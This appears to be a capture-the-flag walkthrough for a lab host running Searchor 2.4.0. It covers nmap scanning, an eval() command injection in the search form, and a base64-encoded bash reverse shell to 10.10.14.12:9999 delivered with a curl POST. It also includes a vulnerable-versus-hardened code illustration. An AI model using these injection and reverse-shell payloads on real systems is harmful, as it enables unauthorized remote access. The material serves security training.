ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.208 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sV 10.10.11.208
nmap -p$ports -sC 10.10.11.208
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-30 15:33 IST
Nmap scan report for 10.10.11.208
Host is up (0.31s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
Found the hostname searcher.htb: the Apache server redirects requests for the IP to that name, and the web application behind it reports Server: Werkzeug/2.1.2 Python/3.10.6.
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/blob/main/exploit.sh
There is a vulnerability in the search form.
Check for SSTI/injection by sending test input through Burp.
The Python application passes the query into eval(), so injected Python executes as a command. Inject:
') + str(__import__('os').system('id')) #
__import__() imports a module dynamically at runtime and returns the module object.
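As an added illustration (not Searchor's own source and not the linked exploit), here is the eval-based dispatch pattern described above beside a hardened version; the ENGINES table and the function names are constructed for this example.

```python
from urllib.parse import quote_plus

# Constructed allowlist of engines (illustrative, not Searchor's real table).
ENGINES = {
    "Google": "https://www.google.com/search?q={}",
    "Bing": "https://www.bing.com/search?q={}",
}


def build_url(engine: str, query: str) -> str:
    """Format the query into the engine's URL template."""
    return ENGINES[engine].format(quote_plus(query))


def search_vulnerable(engine: str, query: str) -> str:
    """Vulnerable pattern: user input is spliced into Python source text
    and handed to eval(). A single quote in `query` closes the string
    literal, so whatever follows is parsed and run as Python code, which
    is exactly what the `') + str(__import__('os')...` payload relies on."""
    expr = f"build_url('{engine}', '{query}')"
    return eval(expr)  # deliberately unsafe, kept to show the flaw


def search_safe(engine: str, query: str) -> str:
    """Hardened form: no eval. The engine name is looked up in an
    allowlist and the query is only ever treated as data (URL-encoded),
    so quotes, parentheses and dunder names cannot alter control flow."""
    template = ENGINES.get(engine)
    if template is None:
        raise ValueError(f"unsupported engine: {engine!r}")
    return template.format(quote_plus(query))
```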
echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.12/9999 0>&1'" | base64 -w0
The POST body should be:
',__import__('os').system('echo YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvOTk5OSAwPiYxJw== |base64 -d|bash -i'))
The curl command is:
curl -s -X POST http://searcher.htb/search -d "engine=Google&query=',__import__('os').system('echo YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvOTk5OSAwPiYxJw== |base64 -d|bash -i'))" 1> /dev/null
If that does not work, run the linked exploit script directly. Either way this gives a reverse shell as svc.